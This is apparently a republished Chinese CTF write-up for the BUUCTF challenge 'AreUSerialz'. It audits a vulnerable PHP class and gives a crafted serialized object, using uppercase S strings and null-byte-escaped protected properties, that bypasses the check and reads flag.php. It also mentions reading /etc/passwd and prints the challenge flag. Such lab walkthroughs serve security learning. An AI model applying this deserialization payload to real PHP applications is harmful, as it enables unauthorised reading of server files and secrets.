【web | CTF】BUUCTF [网鼎杯 2020 青龙组]AreUSerialz

本文主要是介绍【web | CTF】BUUCTF [网鼎杯 2020 青龙组]AreUSerialz，希望对大家解决编程问题提供一定的参考价值，需要的开发者们随着小编来一起学习吧！

天命：php的序列化题目简直是玄学，既不能本地复现，也不能求证靶场环境

天命：本地php是复现不了反序列化漏洞的，都不知道是版本问题还是其他问题

天命：这题也是有点奇怪的，明明用字符串2也应该是可以，但偏偏就不行，神奇了

进来题目先看到php代码审计，是反序列化漏洞

先看进来入口的逻辑，判断是不是正常的ascii码字符，然后反序列化，可以忽略校验，都是正常的

// 校验你是不是ascii码里面的合法字符
function is_valid($s) {for($i = 0; $i < strlen($s); $i++)if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))return false;return true;
}// 接受变量然后校验，进行反序列化激活类
if(isset($_GET{'str'})) {$str = (string)$_GET['str'];if(is_valid($str)) {$obj = unserialize($str); // 反序列化}}

接下来看一下生命周期函数和四大函数

看了一下只有读文件函数是有用的，那就要 $op=2 或者$op='2' 才行

    // 生命周期函数：初始化函数function __construct() {$op = "1";$filename = "/tmp/tmpfile";$content = "Hello World!";$this->process();}// 关键函数，当op等于2时候才进去正确的函数，读文件public function process() {if($this->op == "1") {$this->write();} else if($this->op == "2") {$res = $this->read();$this->output($res);} else {$this->output("Bad Hacker!");}}// 这个函数是废的，我们要读取文件找flag，不是来写东西进文件private function write() {}// 文件包含漏洞的函数，能读取所有的文件，包括/etc/passwd都能读取private function read() {$res = "";if(isset($this->filename)) {$res = file_get_contents($this->filename);}return $res;}// 打印出来private function output($s) {echo "[Result]: <br>";echo $s;}

$op 等于整数 2 即可，$filename等于 flag.php 即可，不需要 fuzz 

比赛的现场题目是需要fuzz或者寻找一些配置文件来探索flag文件在哪里的

反正权限贼高，能读到 /etc/passwd

class FileHandler {public $op = 2;public $filename = "flag.php";public $content = "aaa";}$obj = new FileHandler();
echo serialize($obj);// 最后生成如下
O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:8:"flag.php";s:7:"content";s:3:"aaa";}

需要改动一下

改动1：把小写s改成大写S

改动2：在op前面增加\00*\00，因为私有属性是会自带 * 号，需要用\00来截断（原理不清楚）

奇怪的地方：$op是整数2，不能是字符串的2，很奇怪，明明字符串的2也可以啊

改好后最终答案如下

O:11:"FileHandler":3:{S:5:"\00*\00op";i:2;S:11:"\00*\00filename";S:8:"flag.php";S:10:"\00*\00content";S:3:"aaa";}

flag{5f3275d0-e4ee-4faa-b72c-8c129a7c3400}

这篇关于【web | CTF】BUUCTF [网鼎杯 2020 青龙组]AreUSerialz的文章就介绍到这儿，希望我们推荐的文章对编程师们有所帮助！

---